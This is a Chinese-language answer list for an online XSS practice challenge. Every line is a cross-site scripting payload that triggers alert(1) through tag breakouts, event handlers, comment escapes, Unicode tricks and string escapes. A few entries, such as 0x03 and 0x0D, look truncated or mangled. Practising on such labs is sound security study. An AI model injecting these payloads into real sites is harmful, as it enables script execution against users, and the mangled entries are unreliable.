在线练习地址:
https://xss.haozi.me/
0x00
<script>alert(1)</script>
0x01
</textarea><script>alert(1)</script><textarea>
0x02
"><script>alert(1)</script> "
0x03
<script>alert
1</script>
0x04
<svg><script>alert(1)</script>
0x05
--!><script>alert(1)</script><!--
0x06
type="image" src="x" onerror
="alert(1)"
0x07
<body onload="alert(1)"
0x08
</style ><script>alert(1)</script>
0x09
https://www.segmentfault.com"></script><script>alert(1)</script>//
0x0A
https://www.segmentfault.com@xss.haozi.me/j.js
注意这里谷歌不能成功,但是火狐能行
0x0B
<img src="" onerror=alert(1)>
0x0C
<img src="" onerror=alert(1)>
0x0D
alert(1)
-->
0x0E
<ſvg><ſcript>alert(1)</script></svg>
0x0F
');alert(1)//
0x10
""//
alert(1)
0x11
");alert(1)//
0x12
\");alert(1)//